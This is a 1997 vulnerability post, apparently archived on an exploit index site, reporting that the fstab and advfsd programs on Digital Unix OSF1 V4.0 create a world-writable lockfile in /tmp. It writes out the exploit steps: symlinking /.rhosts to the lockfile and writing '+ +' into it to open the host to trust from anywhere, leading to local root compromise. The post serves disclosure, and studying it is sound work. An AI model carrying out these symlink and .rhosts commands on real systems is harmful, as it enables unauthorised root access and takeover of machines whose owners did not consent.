Symlink problems with fstab and advfsd in OSF1

Description:These programs create /tmp files that will follow symlinks and lcobber system files
Author:Efrain Torres Mejia <etorres@POLLUX.JAVERIANA.EDU.CO>
Compromise: root (local)
Vulnerable Systems:Digital Unix OSF1 V4.0
Date:18 November 1997

Date: Tue, 18 Nov 1997 12:17:00 -0500
From: Efrain Torres Mejia <etorres@POLLUX.JAVERIANA.EDU.CO>
Subject: (LOWNOISE) Another Digital Unix Security Problem0

                         .LoW  _  _
                     |\  | _ |(_`|_'
                     |  \|(_)|,_)|_.

H0l4. So here it is another bug for Digital

System: OSF1 V4.0 464 alpha

Program: fstab - Static information about file systems and swap partitions
         advfsd - Starts the AdvFS graphical user interface daemon

Problemo: It creates a lockfile in tmp with nice permitions :)

   /tmp>ls -la

   (Blah Blah Blah.....)

   -rw-rw-rw-   1 root     system    0 Nov xx 15:49 fstab.advfsd.lockfile

What the hell to do with it:

   Before it creates

   ln -s /.rhosts /tmp/fstab.advfsd.lockfile

   from here... cat "+ +" > /tmp/fstab.advfsd.lockfile , etc etc.

if u like to cut:
------------------------- Cut here --------------------

------------------------- and here --------------------

                     The End - El Fin

                      Colombia 1997.

                         .LoW  _  _
                     |\  | _ |(_`|_'
                     |  \|(_)|,_)|_.

                   Efrain 'ET' Torres

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: